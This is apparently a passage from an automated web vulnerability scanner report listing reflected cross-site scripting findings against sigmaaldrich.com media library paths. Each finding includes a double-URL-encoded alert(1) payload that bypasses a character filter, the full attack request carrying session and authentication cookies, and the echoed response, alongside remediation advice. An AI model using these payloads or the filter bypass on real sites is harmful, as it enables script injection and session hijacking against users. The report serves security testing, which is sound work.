Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc8a2d2";alert(1)//7d7bae8e9ef/medialib/labware/labware-icons/stirrers","E404") ;
   </script>
...[SNIP]...

1.399. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c22a1%2522%253balert%25281%2529%252f%252feafda1049fa was submitted in the REST URL parameter 2. This input was echoed as c22a1";alert(1)//eafda1049fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibc22a1%2522%253balert%25281%2529%252f%252feafda1049fa/labware/labware-icons/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibc22a1";alert(1)//eafda1049fa/labware/labware-icons/stirrers","E404") ;
   </script>
...[SNIP]...

1.400. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff1f7%2522%253balert%25281%2529%252f%252f657b7725398 was submitted in the REST URL parameter 3. This input was echoed as ff1f7";alert(1)//657b7725398 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labwareff1f7%2522%253balert%25281%2529%252f%252f657b7725398/labware-icons/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:04 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labwareff1f7";alert(1)//657b7725398/labware-icons/stirrers","E404") ;
   </script>
...[SNIP]...

1.401. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b70e%2522%253balert%25281%2529%252f%252fd1588ba2e3b was submitted in the REST URL parameter 4. This input was echoed as 3b70e";alert(1)//d1588ba2e3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons3b70e%2522%253balert%25281%2529%252f%252fd1588ba2e3b/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons3b70e";alert(1)//d1588ba2e3b/stirrers","E404") ;
   </script>
...[SNIP]...

1.402. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1396%2522%253balert%25281%2529%252f%252f150ae0e8384 was submitted in the REST URL parameter 5. This input was echoed as c1396";alert(1)//150ae0e8384 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/stirrersc1396%2522%253balert%25281%2529%252f%252f150ae0e8384 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:08 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/stirrersc1396";alert(1)//150ae0e8384","E404") ;
   </script>
...[SNIP]...

1.403. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3998f%2522%253balert%25281%2529%252f%252ffed13c53a9e was submitted in the REST URL parameter 1. This input was echoed as 3998f";alert(1)//fed13c53a9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc3998f%2522%253balert%25281%2529%252f%252ffed13c53a9e/medialib/life-science/yfg-detail-page-jpg/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
